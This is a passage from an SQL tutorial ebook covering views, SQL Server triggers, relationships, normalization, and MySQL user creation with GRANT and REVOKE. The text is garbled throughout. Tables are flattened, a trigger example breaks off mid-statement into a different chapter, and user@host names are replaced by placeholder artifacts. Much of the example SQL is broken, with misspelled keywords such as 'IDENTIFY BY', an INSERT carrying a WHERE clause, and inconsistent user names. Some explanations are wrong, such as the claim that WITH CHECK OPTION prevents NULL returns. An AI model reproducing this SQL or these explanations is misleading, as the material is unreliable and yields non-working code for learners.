main queries. Step #4 – Your basic CREATE VIEW statement or syntax will appear like this: Example: Create view view_”table_name AS SELECT “column_name1” FROM “table_name” WHERE [condition]; Let’s have a specific example based on our original table. EmployeesSalary Names Williams, Michael Colton, Jean Anderson, Ted Dixon, Allan Clarkson, Tim Alaina, Ann Rogers, David Lambert, Jancy Kennedy, Tom Schultz, Diana

Age 22 24 30 27 25 32 29 38 27 40

Salary 30000.00 37000.00 45000.00 43000.00 35000.00 41000.00 50000.00 47000.00 34000.00 46000.00

City Casper San Diego Laramie Chicago New York Ottawa San Francisco Los Angeles Denver New York

Based on the table above, you may want to create a view of the customers’ name and the City only. This is how you should write your statement. Example: CREATE VIEW EmployeesSalary_VIEW AS SELECT Names, City FROM EmployeesSalary; From the resulting VIEW table, you can now create a query such as the statement below. SELECT * FROM EmployeesSalary_VIEW; This SQL query will display a table that will appear this way:

EmployeesSalary Names Williams, Michael Colton, Jean Anderson, Ted Dixon, Allan Clarkson, Tim Alaina, Ann Rogers, David Lambert, Jancy Kennedy, Tom Schultz, Diana

City Casper San Diego Laramie Chicago New York Ottawa San Francisco Los Angeles Denver New York

Using the keyword WITH CHECK OPTION These keywords ascertain that there will be no return errors with the INSERT and UPDATE returns, and that all conditions are fulfilled properly. Example: CREATE VIEW “table_Name”_VIEW AS SELECT “column_name1”, “column_name2” FROM “table_name” WHERE [condition] WITH CHECK OPTION; Applying this SQL statement to the same conditions (display name and city), we can come up now with our WITH CHECK OPTION statement. Example: CREATE VIEW EmployeesSalary_VIEW AS SELECT Names, City FROM EmployeesSalary WHERE City IS NOT NULL WITH CHECK OPTION; The SQL query above will ensure that there will be no NULL returns in your

resulting table. DROPPING VIEWS You can drop your VIEWS whenever you don’t need them anymore. The SQL syntax is the same as the main SQL statements. Example: DROP VIEW EmployeesSalary_VIEW; UPDATING VIEWS You can easily UPDATE VIEWS by following the SQL query for main queries. Example: CREATE OR REPLACE VIEW “tablename”_VIEWS (could also be VIEWS_’tablename”) AS SELECT “column_name” FROM “table_name” WHERE condition; DELETING VIEWS The SQL syntax for DELETING VIEWS is much the same way as DELETING DATA using the main SQL query. The difference only is in the name of the table. If you use the VIEW table example above, and want to delete the City column, you can come up with this SQL statement. Example: DELETE FROM EmployeesSalary_VIEW WHERE City = ‘New York’; The SQL statement above would have this output: EmployeesSalary Names Williams, Michael Colton, Jean Anderson, Ted Dixon, Allan Alaina, Ann Rogers, David

Age 22 24 30 27 32 29

Salary 30000.00 37000.00 45000.00 43000.00 41000.00 50000.00

City Casper San Diego Laramie Chicago Ottawa San Francisco

Lambert, Jancy Kennedy, Tom

38 27

47000.00 34000.00

Los Angeles Denver

INSERTING ROWS Creating an SQL in INSERTING ROWS is similar to the UPDATING VIEWS syntax. Make sure you have included the NOT NULL columns. Example: INSERT INTO “table_name”_VIEWS “column_name1” WHERE value1; VIEWS can be utterly useful, if you utilize them appropriately. To date in this EBook tables have been used to represent data and information. Views are like virtual tables but they don’t hold any data and their contents are defined by a query. One of the biggest advantages of a View is that it can be used as a security measure by restricting access to certain columns or rows. Also, you can use views to return a selective amount of data instead of detailed data. A view protects the data layer while allowing access to the necessary data. A view differs to that of a stored procedure in that it doesn’t use parameters to carry out a function. Encrypting the View You can create a view without columns which contain sensitive data and thus hide data you don’t want to share. You can also encrypt the view definition which returns data of a privileged nature. Not only are you restricting certain columns in a view you are also restricting who has access to the view. However, once you encrypt a view it is difficult to get back to the original view detail. Best approach is to make a backup of the original view. Creating a view To create a view in SSMS expand the database you are working on, right click on Views and select New View. The View Designer will appear showing all the tables that you can add. Add the tables you want in the View. Now select which columns you want in the View. You can now change the sort type for each column from ascending to descending and can also give column names aliases. On the right side of sort type there is Filter. Filter restricts what a user can and cannot see. Once you set a filter (e.g. sales > 1000) a user cannot retrieve more information than this view allows.

In the T-SQL code there is a line stating TOP (100) PERCENT which is the default. You can remove it (also remove the order by statement) or change the value. Once you have made the changes save the view with the save button and start the view with vw_ syntax. You can view the contents of the view if you refresh the database, open views, right click on the view and select top 1000 rows. Indexing a view You can index a view just like you can index a table. The rules are very similar. When you build a view the first index needs to be a unique clustered index. Subsequent non clustered indexes can then be created. You need to have the following set to on, and one off: SET ANSI_NULLS ON SET ANSI_PADDING ON SET ANSI_WARNINGS ON SET CONCAT_NULL_YIELDS_NULL ON SET ARITHABORT ON SET QUOTED_IDENTIFIER ON SET NUMERIC_ROUNDABORT OFF Now type the following: CREATE UNIQUE CLUSTERED INDEX _ixCustProduct ON table.vw_CusProd(col1,col2)

Chapter 11 Triggers Sometimes a modification to the data in your database will need an automatic action on data somewhere else, be it in your database, another database or within SQL Server. A trigger is an object that will do it. A trigger in SQL Server is essentially a Stored Procedure which will run performing the action you want to achieve. Triggers are mostly used to ensure the business logic is being adhered to in the database, performing cascading data modifications (i.e. change on one table will result in changes in other tables) and keeping track of specific changes to a table. SQL Server supports three types of triggers: DDL (Data Definition Language) triggers which fire off in response to a DDL statement being executed (e.g. CREATE, ALTER or DROP). DDL triggers can be used for auditing or limiting DBA activity. Logon triggers are triggers that fire off when a session to the instance is established. This trigger can be used to stop users from establishing a connection to an instance. DML triggers (Data Manipulation Language) are triggers which fire off as a result of a DML statement (INSERT, UPDATE, DELETE) being executed. DDL Triggers You can create DDL triggers at either the instance level (server scoped) or the database level (e.g. tables being changed or dropped). You can create DDL triggers that respond to all database level events at server level so that they respond to events in all databases. DDL triggers can provide a mechanism for auditing or limiting the DBA which is useful when you have a team that needs certain (e.g. elevated) permissions to databases. You can use these DDL triggers to carry out the function a DBA would, very useful if you had a junior DBA on your team. When a trigger is executing you have access to a function called EVENTDATA(). This is well formed XML document, this includes data of the user who executed the original statement. So, you can check this to ensure everything is proper. DDL triggers can respond to CREATE, ALTER, DROP, GRANT, DENY, REVOKE and UPDATE STATISTICS.

To create a DDL trigger you use the CREATE TRIGGER DDL statement. The structure of a CREATE TRIGGER is the following: CREATE TRIGGER ON WITH AFTER AS

ON - specifies the scope of the DDL trigger, there is ALL SERVER (instance level) and DATABASE(level) WITH – either with ENCRYPTION (to hide the definition of the trigger) or EXECUTE AS. EXECUE AS takes one of the following - LOGIN, USER, SELF, OWNER, CALLER. It allows you to change the security context of the trigger, i.e. it allows you to change permission level. FOR or AFTER – either the FOR or AFTER keyword. Both are interchangeable in this context. The trigger will execute after the original statement completes. AS – specifies that either the SQL statements that define the code body of the trigger or the EXTERNAL NAME clause to point to a CLR trigger. The following is an example of a DDL trigger which stops any user dropping or altering any table on the server scope: CREATE TRIGGER DDLTriggerExample ON ALL SERVER FOR DROP_TABLE, ALTER_TABLE AS PRINT 'If you want to alter/delete this table you will need to disable this trigger' ROLLBACK; You can disable triggers using the DISABLE TRIGGER and enable triggers with the ENABLE TRIGGER command. The following command disables all triggers on the server scope:

DISABLE TRIGGER ALL ON ALL SERVER Logon Triggers Logon triggers are like DDL triggers except that instead of firing off in response to a DDL event they fire off when a LOGON event occurs in the instance. Logon triggers have an advantage over other logon event handling in SQL Server in that they can stop the user from establishing a connection. This is because it fires at the same time as the event as opposed to waiting for it to complete. This type of trigger is very useful when you want to limit the number of users connecting to the instance. Say for example the server would be very busy in the evening running jobs, the following example illustrates how you can limit access to the instance from 6pm to midnight except for the sysacc account: CREATE TRIGGER StopNightLogin ON ALL SERVER FOR LOGON AS BEGIN IF (CAST(GETDATE() AS TIME) >= CAST('18:00:00' AS TIME) AND CAST(GETDATE() AS TIME) , @variableName Notes on Functions A function cannot alter any external resource like a table for example. A

function needs to be robust and if there is an error generate inside it either from invalid data being passed or the logic then it will stop executing and control will return to the T-SQL which called it.

Chapter 14 Relationships A database relationship is a means of connecting two tables together based on a logical link (i.e. they contain related data). Relationships facilitate database queries to be executed on two or more tables and they also ensure data integrity. Types of relationships There exists three major types in a database: One is to One One is to Many Many is to Many One is to One This type of relationship is pretty rare in databases. A row in a given table X can will have a matching row in another table Y. Equally a row in table Y can only have a matching row in table X. An example of a one is to one relationship is one person having one passport. One is to Many This is probably one of the most prevalent relationships found in databases. A row in a given table X will have several other matching rows present in another table Y, however a row in the same table Y will only have a single row that it matches in table X. An example is Houses in a street. One street had multiple houses and a house belongs to one street. Many is to Many A row in a given table X will possess several matching rows in another specified table Y and the vice versa is also true. This type of relationship is quite frequent where there are zero, one or even many records in the master table related to zero, one or many records in the child table. An example of this relationship is a school where teachers teach students. A teacher can teach many students and each student can be taught by many teachers. Referential Integrity When two tables are connected in a database and have the same information, it is necessary that the data in both the tables is kept consistent, i.e. either the information in both tables change or neither table changes. This is known as

referential integrity. It is not possible to have referential integrity with tables that are in separate databases. When enforcing referential integrity, it isn’t possible to enter a record in a (address) table which doesn’t exist in the other (customer) linked table (i.e. the one with the primary key). You need to first create the customer table and then use its details to create the address table. Also, you can use what is known as a trigger and stored procedures to enforce referential integrity as well as using relationships.

Chapter 15 Database Normalization In this chapter you will learn an in-depth knowledge of normalization techniques and their importance in enhancing database conceptualization and design. As such, more efficient databases are created that will provide the SQL software application an edge in performing effective queries and maintaining data integrity all the time. Definition and Importance of Database Normalization Basically, normalization is the process of designing a database model to reduce data redundancy by breaking large tables into smaller but more manageable ones, where the same types of data are grouped together. What is the importance of database normalization? Normalizing a database ensures that pieces information stored are well organized, easily managed and always accurate with no unnecessary duplication. Merging the data from the CUSTOMER_TBL table with the ORDER_TBL table will result into a large table that is not normalized:

If you look closely into this table, there is data redundancy on the part of the customer named Kathy Ale. Always remember to minimize data redundancy to save disk or storage space and prevent users from getting confused with the amount of information the table contains. There is also a possibility that for every table containing such customer information, one table may not have the same matching information as with another. So how will a user verify which one is correct? Also, if a certain customer information needs to be updated, then you are required to update the data in all of the database tables where it is included. This entails wastage of time and effort in managing the entire database system. Forms of Normalization Normal form is the way of measuring the level to which a database has been normalized and there are three common normal forms: First Normal Form (1NF)

The first normal form or 1NF aims to divide a given set of data into logical units or tables of related information. Each table will have an assigned primary key, which is a specified column that uniquely identifies the table rows. Every cell should have a single value and each row of a certain table refers to a unique record of information. The columns that refer to the attributes of the table information are given unique names and consist of the same type of data values. Moreover, the columns and the rows are arranged is no particular order. Let us add a new table named Employee_TBL to the database that contains basic information about the company’s employees:

Based from the diagram above, the entire company database was divided into two tables – Employee_TBL and Customer_TBL. EmployeeID and CustomerID are the primary keys set for these tables respectively. By doing this, database information is easier to read and manage as compared to just having one big table consisting of so many columns and rows. The data values stored in Employee_TBL table only refer to the pieces of information describing the company’s employees while those that pertain exclusively to the company’s customers are contained in the Customer_TBL table. Second Normal Form (2NF) The second normal form or 2NF is the next step after you are successfully done with the first normal form. This process now focuses on the functional dependency of the database, which describes the relationships existing between attributes. When there is an attribute that determines the value of another, then a functional dependency exists between them. Thus, you will store data values from the Employee_TBL and Customer_TBL tables, which are partly dependent on the assigned primary keys, into separate tables.

In the figure above, the attributes that are partly dependent on the EmployeeID primary key have been removed from Employee_TBL, and are now stored in a new table called Employee_Salary_TBL. The attributes that were kept in the original table are completely dependent on the table’s primary key, which means for every record of last name, first name, address and contract number there is a corresponding unique particular employee ID. Unlike in the Employee_Salary_TBL table, a particular employee ID does not point to a unique employee position nor salary rate. It is possible that there could be more than one employee that holds the same position (EmpPosition), and receives the same amount of pay rate (Payrate) or bonus (Bonus). Third Normal Form (3NF) In the third normal form or 3NF, pieces of information that are completely not dependent on the primary key should still be separated from the database table. Looking back at the Customer_TBL, two attributes are totally independent of the CustomerID primary key - JobPosition (job position) and JobDescription (job position description). Regardless of who the customer is, any job position will have the same duties and responsibilities. Thus, the two attributes will be separated into another table called Position_TBL.

Drawbacks of Normalization Though database normalization has presented a number of advantages in organizing, simplifying and maintaining the integrity of databases, you still need to consider the following disadvantages: Creating more tables to spread out data increases the need to join tables and such task becomes more tedious, which makes the database harder to conceptualize. Instead of real and meaningful data, database tables will contain lines of codes. Query processes becomes extremely difficult since the database model is getting too complex. Database performance is reduced or becomes slower as the normal form type progresses. A normalized database requires much more CPU and memory usage. To execute the normalization process efficiently, the user needs the appropriate knowledge and skills in optimizing databases. Otherwise, the design will be filled with inconsistencies.

Chapter 16 Database Security and Administration MySQL has an integrated advanced access control and privilege system that enables generation of extensive access guidelines for user activities and efficiently prevent unauthorized users from getting access to the database system. There are 2 phases in MySQL access control system for when a user is connected to the server: Connection verification: Every user is required to have valid username and password, that is connected to the server. Moreover, the host used by the user to connect must be the same as the one used in the MySQL grant table. Request verification: After a link has been effectively created for every query executed by the user, MySQL will verify if the user has required privileges to run that` specific query. MySQL is capable of checking user privileges at database, table, and field level. The MySQL installer will automatically generate a database called mysql. The mysql database is comprised of 5 main grant tables. Using GRANT and REVOKE statements like, these tables can be indirectly manipulated. User: This includes columns for user accounts and global privileges. MySQL either accepts or rejects a connection from the host using these user tables. A privilege given under the user table is applicable to all the databases on the server. Database: This comprises of db level privilege. MySQL utilizes the “db_table” to assess the database that can be used by a user to access and to host the connection. These privileges are applicable to the particular database and all the object available in that database, such as stored procedures, views, triggers, tables, and many more. “Table_priv” and “columns_priv”: This includes privileges at the level of column and table. A privilege given in the "table priv" table is applicable only to that columns of that particular table, on the other hand privileges given in the "columns

priv" table is applicable only to that particular column. “Procs_priv”: This includes privileges for saved functions and processes. MySQL uses the tables listed above to regulate MySQL database server privileges. It is extremely essential to understand these tables before implementing your own dynamic access control system. Creating User Accounts In MySQL you can indicate that the user has been privileged to connect to the database server as well as the host to be used by the user to build that connection. As a result, for every user account a username and a host name in MySQL is generated and divided by the @ character. For instance, if an admin user is connected from a localhost to the server, the user account will be named as “[email protected]” However, the “admin_user” is allowed to connect only to the server using a "localhost" or a remote host, which ensures that the server has higher security. Moreover, by merging the username and host, various accounts with the same name can be configured and still possess the ability to connect from distinct hosts while being given distinct privileges, as needed. In the mysql database all the user accounts are stored in the "user grant" table. Using MySQL CREATE USER Statement The “CREATE USER”is utilized with the MySQL server to setup new user accounts, as shown in the syntax below: CREATE USER usr_acnt IDENTIFY BY paswrd; In the syntax above, the CREATE USER clause is accompanied by the name of the user account in username @ hostname format. In the "IDENTIFIED BY" clause, the user password would be indicated. It is important that the password is specified in plain text. Prior to the user account being saved in the user table, MySQL is required for encryption of the user passwords. For instance, these statements can be utilized as given below, for creating a new "user dbadmin,” that is connected to the server from local host using user password as Safe.

CREATE USER [email protected] IDENTIFY BY 'Safe'; If you would like to check the permissions given to any user account, you can run the syntax below: SHOW GRANTS FOR [email protected] and [email protected]; "+-------------------------------------+ | Grnts [email protected]| +--------------------------------------+ | GRANT USAGE ON *.* TO ‘dbadmn’ @ ‘localhst’ | +--------------------------------------+ | GRANT USAGE ON *.* TO ‘dbadmn2’ @ ‘localhst2’ | +--------------------------------------+ 2 rows in set (0.20 secs)" The *. * in the output above indicates that the dbadmn and dbadmn2 users are allowed to log into the server only and do not have any other access privileges. Bear in mind that the portion prior to the dot (.) is representing the db and the portion following the dot is representing the table, for example, db.tab. The percentage (%) wildcard can be used as shown in the syntax below for allowing a user to create a connection from any host: CREATE USER [email protected]'%' IDENTIFY BY 'safe'; The percentage (%) wildcard will lead to identical result as when included in the “LIKE” operator, for example, to enable msqladmn user account to link to the server from any “subdomain” of the mysqhost.something host, this can be used as shown in the syntax below: CREATE USER ‘[email protected]' % ‘mysqhost.something' IDENTIFT by 'safe';" It should also be noted here, that another wildcard underscore (_) can be used in the CREATE USER statement.

If the host name portion can be omitted from the user accounts, server will recognize them and enable the users to get connected from other hosts. For instance, the syntax below will generate a new remote user account that allows creation of a connection to from random hosts: CREATE USER remoteuser; To view the privileges given to the remoteuser and remoteuser2 account, you can use the syntax below: SHOW GRANTS FOR remoteuser, remoteuser2; +---------------------------------------+ | Grnts for [email protected]%

|

+---------------------------------------+ | GRANT USAGE ON *.* TO ‘remoteuser’ @ ‘%’ | +---------------------------------------+ | GRANT USAGE ON *.* TO ‘remoteuser2’ @ ‘%’ | +------------------------------------+ 2 rows in set (0.30 secs)" It is necessary to remember that the single quotation (' ') in the syntax above is particularly significant, if the user accounts have special characters like underscore or percentage. If you inadvertently cite the user account as [email protected], the server will create new user with the name as [email protected] and enables it to start a connection from random hosts, that cannot be anticipated. The syntax below, for instance, can be used to generate a new [email protected] that could be connected to the server from random hosts. CREATE USER '[email protected]'; SHOW GRANTS FOR '[email protected]'; +---------------------------------------+ | Grnts for [email protected]@% | +-------------------------------------------+ | GRANT USAGE ON *.* TO ‘[email protected]’ @ ‘%’ |

+----------------------------------------+ 1 row(s) in set (0.01 sec) If you accidentally generate a user that has already been created in the database, then an error will be issued by MySQL. For instance, the syntax below can be used to generate a new user account called remoteuser: CREATE USER remoteuser; The error message below will be displayed on your screen: ERROR 1398 (HY0000): Action CREATE USER fails for 'remoteuser'@ '%' It can be noted that the "CREATE USER" statement will only create the new user but not grant any privileges. The GRANT statement can be utilized to give access privileges to the users. Updating USER PASSWORD Prior to altering a MySQL user account password, the concerns listed below should be taken into consideration: The user account whose password you would like to be modified. The applications that are being used with the user account for which you would like to modify the password. If the password is changed without altering the application connection string being used with that user account, then it would be not feasible for those applications to get connected with the database server. MySQL offers a variety of statements that can be used to alter a user's password, such as UPDATE, SET PASSWORD, and GRANT USAGE statements. Let’s explore some of these syntaxes! Using UPDATE Statement The UPDATE can be utilized to make updates to the user tables in the database. You must also execute the “FLUSH PRIVILEGES” statements to refresh privileges from the “grant table,” by executing the UPDATE statement.

Assume that you would like to modify the password for the dbadmn user, which links from the local host to the fish. It can be accomplished by executing the query below: USE msql; UPDATE usr SET paswrd = PASWRD ('fish') WHERE usr = 'dbadmn' AND host = 'lclhst'; FLUSH PRIVILEGES; Using SET PASSWORD Statement For updating the user password, the [email protected] format is utilized. Now, imagine that you would like to modify the password for some other user's account, then you will be required to have the UPDATE privilege on your user account. With the use of the SET PASSOWORD statement, the FLUSH PRIVILEGES statement is not required to be executed, in order to reload privileges to the mysql database from the grant tables. The syntax below could be utilized to alter the dbadmn user account password: SET PASSWORD FOR 'dbadmn'@ 'lclhst' = PASSWORD('bigfish'); Using ALTER USER Statement Another method to update the user password is with the use of the ALTER USER statements with the “IDENTIFIED BY” clause. For instance, the query below can be executed to change the password of the dbadmn user to littlefish. ALTER USER [email protected] IDENTIFY BY 'littlefish'; ***USEFUL TIP*** If you need to change the password of the “root account,” then the server must be force quit and started back up without triggering the grant table validation. Granting User Privileges

As a new user account is created, there are no access privileges afforded to the user by default. The "GRANT" statement must be used in order for granting privileges to all user accounts. The syntax of these statements are shown below: GRANT priv,[priv], .... ON priv_level TO usr [IDENTIFIED BY pswrd] [REQUIRE tssl_optn] [WITH [GRANT_OPTION | resrce_optn]]; In the syntax above, we start by specifying one or more privileges following the GRANT clause. Every privilege being granted to the user account must be isolated using a comma, in case you would like to give the user account more than one privilege at the same time. (The list of potential privileges that may be granted to a user account is given in the table below). After that you must indicate the "privilege_level" that will determine the levels at which the privilege is applied. The privilege level supported by MySQL are "global (*. *),” "database (database. *),” "table (database.table)" and "column" levels. Next you need to indicate the user that needs to be granted the privileges. If the indicated user can be found on the server, then the GRANT statement will modify its privilege. Or else, a new user account will be created by the GRANT statement. The IDENTIFIED BY clause is not mandatory and enables creation of a new password for the user. Thereafter, it's indicated if the user needs to start a connection to the database via secured connections. At last, the "WITH GRANT OPTION" clause is added which is not mandatory but enables granting and revoking the privileges of other user, that were given to your own account. Moreover, the WITH clause can also be used to assign the resources from the MySQL database server, for example, putting a limit on the number of links or statements that can be

used by the user per hour. In shared environments like MySQL shared hosting, the WITH clause is extremely useful. Note that the GRANT OPTION privilege as well as the privileges you are looking to grant to other users must already be configured to your own user account, so that you are able to use the GRANT statement. If the read only system variable has been allowed, then execution of the GRANT statement requires the SUPER privilege. PRIVILEGE “ALL”

“ALTER”

“ALTER ROUTINE” “CREATE”

“CREATE ROUTINE” “CREATE TABLESPACE”

DESCRIPTION LEVEL Global Granting all of the privileges at specific access levels except the GRANT OPTION. Allowing users Y the usage of ALTER TABLE statement. Allowing users Y to alter and drop saved routines. Allowing users Y to generate databases and tables. Allowing users Y to create saved routines. Allowing users Y to generate, modify or remove tables and log file groups.

LEVEL LEVEL LEVEL Database Table Column

Y

Y

Y

Y

Y

Y

“CREATE TEMPORARY TABLES”

“CREATE USER”

“CREATE VIEW” “DELETE”

“DROP”

“EVENT”

“EXECUTE”

“FILE”

Allowing users to generate temp tables with the use of the CREATE TEMPORARY TABLE. Allowing users to utilize the CREATE, DROP, RENAME any USER, and REVOKE ALL PRIVILEGES statements. Allowing users to generate or update views. Allowing users to utilize the DELETE keyword. Allowing users to remove databases, tables and views. Enabling the usage of events for the Event Scheduler. Allowing users for execution of saved routines. Allowing users to read the files

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

“GRANT OPTION”

“INDEX”

“INSERT”

“LOCK TABLES”

“PROCESS”

“PROXY”

REFERENCES

“RELOAD”

in the db directories. Allowing users privilege for granting or revoking privileges from other users. Allowing users to generate or drop indexes. Allowing users the usage of INSERT statements. Allowing users the usage of LOCK TABLES on tables that have the SELECT privileges. Allowing users to view all processes with SHOW PROCESSLIST statements. Enabling creation of proxy of the users. Allowing users to generate foreign key. Allowing users the usage of the

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

FLUSH operation. “REPLICATION Allowing users CLIENT” to query to see where master or slave servers are. “REPLICATION Allowing the SAVE” users to use replicated slaves to read binary log events from the master. “SELECT” Allowing users the usage of SELECT statements. “SHOW Allowing users DATABASES” to view all databases. “SHOW VIEW” Allowing users to utilize SHOW CREATE VIEW statement. “SHUTDOWN” Allowing users to use mysqladmin shutdown commands. “SUPER” Allowing users to utilize other administrative operations like CHANGE MASTER TO, KILL, PURGE BINARY LOGS,

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

Y

“TRIGGER”

“UPDATE”

“USAGE”

SET GLOBAL, and mysqladmin commands. Allowing users the usage of TRIGGER operations. Allowing users the usage of UPDATE statements. Equivalent to no privilege.

Y

Y

Y

Y

Y

Y

Y

EXAMPLE More often than not, the CREATE USER statement will be used to first create a new user account and then the GRANT statement is used to assign the user privileges. For instance, a new super user account can be created by the executing the CREATE USER statement given below: CREATE USER [email protected] IDENTIFIED BY 'dolphin'; In order to check the privileges granted to the [email protected] user, the query below with SHOW GRANTS statement can be used. SHOW GRANTS FOR [email protected]; +-------------------------------------------+ | Grants for [email protected] | +-------------------------------------------+ | GRANT USAGE ON *.* TO `super`@`localhost` | +-------------------------------------------+ 1 row in set (0.00 sec) Now, if you wanted to assign all privileges to the [email protected] user, the

query below with GRANT ALL statement can be used. GRANT ALL ON *.* TO 'super'@'localhost' WITH GRANT OPTION; The ON*. * clause refers to all databases and items within those databases. The WITH GRANT OPTION enables [email protected] to assign privileges to other user accounts. If the SHOW GRANTS statement is used again at this point then it can be seen that privileges of the [email protected]'s user have been modified, as shown in the syntax and the result set below: SHOW GRANTS FOR [email protected]; +----------------------------------------------------------------------+ | Grants for [email protected]

|

+----------------------------------------------------------------------+ | GRANT ALL PRIVILEGES ON *.* TO `super`@`localhost` WITH GRANT OPTION | +----------------------------------------------------------------------+ 1 row in set (0.00 sec) Now, assume that you want to create a new user account with all the server privileges in the classicmodels sample database. You can accomplish this by using the query below: CREATE USER [email protected] IDENTIFIED BY 'whale'; GRANT ALL ON classicmodels.* TO [email protected]; Using only one GRANT statement, various privileges can be granted to a user account. For instance, to generate a user account with the privilege of executing SELECT, INSERT and UPDATE statements against the database classicmodels, the query below can be used. CREATE USER rfc IDENTIFIED BY 'shark'; GRANT SELECT, UPDATE, DELETE ON classicmodels.* TO rfc;

Revoking User Privileges You will be using the statement MySQL REVOKE to revoke any of

the privileges of any user account(s). MySQL enables withdrawal of one or more privileges or even all of the previously granted privileges of a user account. The query below can be used to revoke particular privileges from a user account: REVOKE privilege_type [(column_list)] [, priv_type [(column_list)]]... ON [object_type] privilege_level FROM user [, user]... In the syntax above, we start by specifying a list of all the privileges that need to be revoked from a user account next to REVOKE keyword. You might recall when listing multiple privileges in a statement they must be separated by commas. Then we indicate the level of the privilege at which the ON clause will be revoking these privileges. Lastly we indicate the user account whose privileges will be revoked in the specified FROM clause. Bear in mind that your own user account must have the GRANT OPTION privilege as well as the privileges you want to revoke from other user accounts. You will be using the REVOKE statement as shown in the syntax below, if you are looking to withdraw all privileges of a user account: REVOKE ALL PRIVILEGES, GRANT OPTION FROM user [, user]… It is important to remember that you are required to have the CREATE USER or the UPDATE privilege at global level for any given mysql database, to be able to execute the REVOKE ALL statement. You will be using REVOKE PROXY clause as shown in the query below, in order to revoke proxy users: REVOKE PROXY ON user FROM user [, user]... You define a proxy user as a validated user within any MySQL environment who has the capabilities of impersonating another user. As a result, the proxy user is able to attain all the privileges granted to the user that it is impersonating. The best practice dictates that you should first check what privileges have

been assigned to the user by executing the syntax below with the statement SHOW GRANTS, prior to withdrawing the user's privileges: SHOW GRANTS FOR user; EXAMPLE Assume that there is a user named rfd with SELECT, UPDATE and DELETE privileges on the classicmodels sample database and you would like to revoke the UPDATE and DELETE privileges from the rfd user. To accomplish this, you can execute the queries below. To start with we will check the user privileges using the SHOW GRANTS statement below: SHOW GRANTS FOR rfd; GRANT SELECT, UPDATE, DELETE ON 'classicmodels'.* TO 'rfc'@'%' At this point, the UPDATE and REVOKE privileges can be revoked from the rfd user, using the query below: REVOKE UPDATE, DELETE ON classicmodels.* FROM rfd; Next, the privileges of the rfd user can be checked with the use of SHOW GRANTS statement. SHOW GRANTS FOR 'rfd'@'localhost'; GRANT SELECT ON 'classicmodels'.* TO 'rfd'@'%' Now, if you wanted to revoke all the privileges from the rfd user, you can use the query below: REVOKE ALL PRIVILEGES, GRANT OPTION FROM rfd; To verify that all the privileges from the rfd user have been revoked, you will need to use the query below: SHOW GRANTS FOR rfd; GRANT USAGE ON *.* TO 'rfd'@'%' Remember, the USAGE privilege simply means that the user has no privileges in the server. Resulting Impact of the REVOKE Auery The impact of MySQL REVOKE statement relies primarily on the level of privilege granted to the user account, as explained below:

The modifications made to the global privileges will only take effect once the user has connected to the MySQL server in a successive session, post the successful execution of the REVOKE query. The modifications will not be applicable to all other users connected to the server, while the REVOKE statement is being executed. The modifications made to the database privileges are only applicable once a USE statement has been executed after the execution of the REVOKE query. The table and column privilege modifications will be applicable to all the queries executed, after the modifications have been rendered with the REVOKE statement.

Chapter 17 Real-World Uses We have seen how we can use SQL in isolation. For instance, we went through different ways to create tables and what operations you can perform on those tables to retrieve the required answers. If you only wish to learn how SQL works, you can use this type of learning, but this is not how SQL is used. The syntax of SQL is close to English, but it is not an easy language to master. Most computer users are not familiar with SQL, and you can assume that there will always be individuals who do not understand how to work with SQL. If a question about a database comes up, a user will almost never use a SELECT statement to answer that question. Application developers and systems analysts are probably the only people who are comfortable with using SQL. They do not make a career out of typing queries into a database to retrieve information. They instead develop applications that write queries. If you intend to reuse the same operation, you should ensure that you never have to rebuild that operation from scratch. Instead, write an application to do the job for you. If you use SQL in the application, it will work differently. SQL IN AN APPLICATION You may believe that SQL is an incomplete programming language. If you want to use SQL in an application, you must combine SQL with another procedural language like FORTRAN, Pascal, C, Visual Basic, C++, COBOL, or Java. SQL has some strengths and weaknesses because of how the language is structured. A procedural language that is structured differently will have different strengths and weaknesses. When you combine the two languages, you can overcome the weaknesses of both SQL and the procedural language. You can build a powerful application when you combine SQL and a procedural language. This application will have a wide range of capabilities. We use an asterisk to indicate that we want to include all the columns in the table. If this table has many columns, you can save a lot of time by typing an asterisk. Do not use an asterisk when you are writing a program in a procedural language. Once you have written the application, you may want to add or delete a column from the table when it is no longer necessary. When you do this, you change the meaning of the asterisk. If you use the asterisk in the application, it may retrieve columns which it thinks it is getting.

This change will not affect the existing program until you need to recompile it to make some change or fix a bug. The effect of the asterisk wildcard will then expand to current columns. The application could stop working if it cannot identify the bug during the debugging process. Therefore, when you build an application, refer to the column names explicitly in the application and avoid using the asterisk. Since the replacement of paper files stored in a physical file cabinet, relational databases have given way to new ground. Relational database management systems, or RDBMS for short, are used anywhere information is stored or retrieved, like a login account for a website or articles on a blog. Speaking of which, this also gave a new platform to and helped leverage websites like Wikipedia, Facebook, Amazon, and eBay. Wikipedia, for instance, contains articles, links, and images, all of which are stored in a database behind-the-scene. Facebook holds much of the same type of information, and Amazon holds product information and payment methods, and even handles payment transactions. With that in mind, banks also use databases for payment transactions and to manage the funds within someone’s bank account. Other industries, like retail, use databases to store product information, inventory, sales transactions, price, and so much more. Medical offices use databases to store patient information, prescription medication, appointments, and other information. To expand further, using the medical office for instance, a database gives permission for numerous users to connect to it at once and interact with its information. Since it uses a network to manage connections, virtually anyone with access to the database can access it from just about anywhere in the world. These types of databases have also given way to new jobs and have even expanded the tasks and responsibilities of current jobs. Those who are in finance, for instance, now have the ability to run reports on financial data; those in sales can run reports for sales forecasts, and so much more! In practical situations, databases are often used by multiple users at the same time. A database that can support many users at once has a high level of concurrency. In some situations, concurrency can lead to loss of data or the reading of non-existent data. SQL manages these situations by using

transactions to control atomicity, consistency, isolation, and durability. These elements comprise the properties of transactions. A transaction is a sequence of T-SQL statements that combine logically and complete an operation that would otherwise introduce inconsistency to a database. Atomicity is a property that acts as a container for transaction statements. If the statement is successful, then the total transaction completes. If any part of a transaction is unable to process fully, then the entire operation fails, and all partial changes roll back to a prior state. Transactions take place once a row, or a page-wide lock is in place. Locking prevents modification of data from other users taking effect on the locked object. It is akin to reserving a spot within the database to make changes. If another user attempts to change data under lock, their process will fail, and an alert communicates that the object in question is barred and unavailable for modification. Transforming data using transactions allows a database to move from one consistent state to a new consistent state. It's critical to understand that transactions can modify more than one database at a time. Changing data in a primary key or foreign key field without simultaneously updating the other location, creates inconsistent data that SQL does not accept. Transactions are a big part of changing related data from multiple table sources all at once. Transactional transformation reinforces isolation, a property that prevents concurrent transactions from interfering with each other. If two 